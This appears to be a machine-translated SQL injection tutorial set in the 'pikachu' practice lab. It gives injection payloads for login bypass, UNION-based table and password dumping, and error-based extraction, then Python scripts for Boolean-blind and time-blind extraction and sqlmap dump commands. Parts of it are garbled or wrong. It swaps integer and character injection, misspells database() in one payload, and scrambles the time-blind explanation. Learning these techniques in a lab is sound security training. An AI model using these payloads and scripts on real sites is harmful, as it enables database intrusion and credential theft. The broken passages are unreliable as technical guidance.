Table of contents
1. [Getting started] Normal query injection:
1.2 Inject to get user information:
1.2.2 Analysis of injection statement:
1.3 The difference between integer injection and character injection:
2. [Advanced] Step by step injection from library to column:
2.1.3 information_schema library:
2.2.2 Check the database name:
2.2.3 Check all table names in the database:
2.2.4 Look up all the column names in the table:
2.2.5 Query the information in the table according to the fields:
3. [Advanced] Injection using error statements:
3.2 Injection into actual combat
5.2 Example of Time Blind Betting:
6. [Additional] Use of Sqlmap:
Foreword:
SQL Injection Vulnerability One of the OWASP Top 10 vulnerabilities refers to the behavior that hackers insert malicious SQL statements into the input parameters of web applications, thereby causing the background database server to be attacked. The main reason for this kind of vulnerability is that in the data interaction, when the front-end data is passed to the background for processing, no strict judgment is made, which leads to the fact that the incoming "data" is spliced into the SQL statement and is regarded as the SQL statement. Partial execution, resulting in damage to the database, leakage of user privacy and confidential data
1. [Getting started] Normal query injection:
1.0 Experimental environment:
The table used for the experiment is:
Suppose the background query statement is:
select password from users where id='$GET['id']';The statement can be obtained by analyzing the statement, which will be submitted to the database according to the parameter id submitted by our GET method to query the value corresponding to the password column in the row in the id column equal to the submitted id parameter
1.1 Perform a common query:
The statement is:
select password from users where id='tom';
这里我们提交的id参数为tom,也就是所在表中查询tom的passwordThe result is:
Obviously, we found out Tom's password
1.2 Inject to get user information:
1.2.1 Execution injection:
The injection statement is:
select password from users where id='tom' or 1=1;#';
#我们传入的 id 为 tom' or 1=1;#The result is:
We can see that all user information is exposed
1.2.2 Analysis of injection statement:
The id value we pass in to the background is:
tom' or 1=1;#
The query statement formed in the background is:
select password from users where id='tom' or 1=1;#';
The red single quotes are the ones that come with the query statement, and the orange single quotes are the ones we passed in
- You can see that the first red single quote is paired with the single quote we passed in , while the second red single quote is commented out by the # sign we passed in (the # sign acts as a comment in the sql statement), Then tom is closed in advance by the single quotes we passed in, forming the first query condition
- or represents a logical operator, representing or
- The second query condition is : 1=1 The result of this statement is always true (1 is always equal to 1)
Analyzing here, the query statement can be simplified as:
select password from users where id='tom' or True;Can be understood as id='tom' or true
That is to say, as long as the id has an existing value , the statement will continue to search (id is equal to any value in the column and the result is True)
1.3 The difference between integer injection and character injection:
The injection examples described above are character-type, and character-type injections often appear in actual combat environments
The comparison of the two query statements is as follows:
select password from users where id='$GET['id']'; #字符型
我们可以看到传入的参数在单引号中,故为字符型,因为字符串要被单引号括住
select password from users where id=$GET['id']; #整型
我们可以看到传入的参数两边无单引号,故为整型When encountering character injection, there is no need to construct quotation marks to close (because the background statement does not have single quotation marks) , just comment out the latter with quotation marks at the end
2. [Advanced] Step by step injection from library to column:
Generally, there is a query injection. We can not only query all the same type of information, but also query the version, name, and all tables and field information of the database.
2.1 Preliminary knowledge:
2.1.1 union function:
Perform a union operation on the two select statements before and after , excluding duplicate rows, and sort the default rules at the same time; the number of fields to be queried by the two select statements before and after is the same , we can customize a select statement according to this function to query us desired information
2.1.2 order by function:
This function is followed by a number, which refers to grouping, sorting, etc. according to the columns queried after select. 1 represents the first column, 2 represents the second column, and so on. If the number we enter is greater than the one queried after select The number of columns, then it will return failure, so we can determine the number of fields queried by the previous select statement by constantly changing the number behind
2.1.3 information_schema library:
This is the information database that comes with MySQL, which is used to store database metadata (data about the database), such as database name, table name, column data type, access rights, etc. We can find all the tables of the database in the table information_schema.tables
The table of contents is as follows
2.2 Actual injection:
Here we take the pikachu shooting range as an example
2.2.1 Rectangular columns:
xx' order by 2#
2不报错,3报错,说明后台查询字段数为2,我们拼凑的查询语句字段数也应为2The result is:
2.2.2 Check the database name:
xx' union select database(),1#
database()为MySQL的一个环境变量,代表当前数据库
1是用来凑数的,因为前面的select语句为2个字段The result is:
2.2.3 Check all table names in the database:
- The tables table of the information_schema library is used here , which contains information about all tables in the database
xx' union select 1,table_name from information_schema.tables where table_schema="pikachu"#The result is:
2.2.4 Look up all the column names in the table:
- The columns table of the information_schema library is used here , which contains the information of all the columns in the table
1' union select 1,column_name from information_schema.columns where table_name= "users"#
The result is:
2.2.5 Query the information in the table according to the fields :
xx' union select username,password from users#The result is:
2.2.6 Summary:
- We first revealed the name of the current database, and then revealed the names of all the tables in the database, and selected the users table, revealed the names of the largest columns, and finally queried the username and password column information through union
3. [Advanced] Injection using error statements:
In some environments, we can not only inject through the select statement, but also inject through the error statement, and use the error statement to bring out the data
3.1 Related functions:
3.1.1 extractvalue()
The format is:
extractvalue(xml_document,XPath_string)
xml_document: a string containing the XML document
XPath_string: An XPath expression used to locate the value to be extracted
- If the xml file path corresponding to the parameter information does not exist, the wrong path will be returned in the form of an error report . We can make the path parameter a query statement , so that the result of the query statement will be returned in the form of an error report.
3.1.2 updatexml()
The format is:
The format is
updatexml(xml_document, XPath_string, new_value)
xml_document: a string containing an XML document,
XPath_string: an XPath expression used to locate the node to be modified
new_value: the new value to be replaced.
- The nature of this function is the same as the previous one. If the path is wrong, an error will be reported, and the utilization method is the same as the previous one.
3.2 Injection into actual combat
Also take the pikachu shooting range as an example
payload:
xx' and updatexml(1,datebase(),0)#We can see that the database name is popped up ( this is just to query the database name as an example, the steps are similar to the above, just replace the XPath_string parameter with the corresponding query statement )
4. [Advanced] Boolean Blind:
4.1 What is Boolean Blind:
Boolean blind injection is a SQL injection technique based on the logical judgment of true and false . The attacker constructs some Boolean expressions and judges whether the injection is successful according to the different responses displayed on the page
4.2 Boolean blind example:
For example, the level of pikachu: when the input information does not exist, the same sentence will be returned
We can judge whether the injection is true or false through the returned information
4.3 Boolean blind script:
- The principle of the script is to use the and logical operator to connect the query to be true, and the library name and table name that we blasted one by one according to the ASCII table. Only when they are all true , will the successful query flag be returned (manual injection Almost impossible, too time consuming, use scripts in most cases)
//该脚本只能爆出数据库名,爆其他信息手动更改payload即可
import requests
url="xxxx/?id="
flag=''
for i in range(1,10):
print(i)
low=32
high=128
mid=(low+high)//2
while low<high:
payload="1' and ascii(substr(database(),%d,1))>%d--+"%(i,mid)
r=requests.get(url=url+payload)
if "You are in" in r.text:
low=mid+1
else:
high=mid
mid=(low+high)//2
if(mid==32):
break
flag=flag+chr(mid)
print(flag)5. [Advanced] Time Blind:
5.1 What is the time blind:
Blind time injection is a time -based SQL injection attack technique. In some cases, the page will only return one result, and it is impossible to judge whether the injection is successful in a normal way. At this time, the attacker can use delay functions such as and to add commands to wait for a certain period of time sleep()in benchmark()the SQL statement, according to The response time of the page to determine whether the condition is correct
5.2 Example of Time Blind Betting:
For example, the level of pikachu: When we enter a username that does not exist, it will only return the same sentence
Regardless of whether the data we pass in exists or not, the return result is the same, so we need to judge whether the injection is right or wrong by the response time
5.3 Time Blind Script:
- It can be used by modifying the url and payload according to the actual scene. The script principle is similar to the Boolean blind injection script.
该脚本只能爆出数据库名,爆其他信息手动更改payload即可
import time
import requests
flag=""
session=requests.Session()
url="xxx/?id="
for i in range(1,100):
print(i)
low=32
high=128
mid=(low+high)//2
while low<high:
payload = "1' and if(ascii(substr(database(),%d,1))>%d,sleep(1),1)--+"%(i,mid)
stat_time = time.time()
r = session.get(url=url+payload)
end_time = time.time()
t = end_time - stat_time
if t > 1:
low = mid + 1
else:
high = mid
mid = (low + high)//2
if mid==32:
break
flag=flag+chr(mid)
print(flag)6. [Additional] Use of Sqlmap:
6.1 What is sqlmap:
sqlmapIt is an open source automated SQL injection tool that can be used to detect and exploit SQL injection vulnerabilities in web applications and obtain sensitive information from databases. The tool supports multiple database types (such as MySQL, Oracle, PostgreSQL, etc.) and operating systems (such as Windows, Linux, etc.) official website download link
6.2 Basic usage:
sqlmap -u "http://www.xx.com?id=x" 查询是否存在注入点
--dbs 检测站点包含哪些数据库
--current-db 获取当前的数据库名
--tables -D "db_name" 获取指定数据库中的表名
--columns -T "table_name" -D "db_name" 获取数据库表中的字段
--dump -C "columns_name" -T "table_name" -D "db_name" 获取指定列的数据内容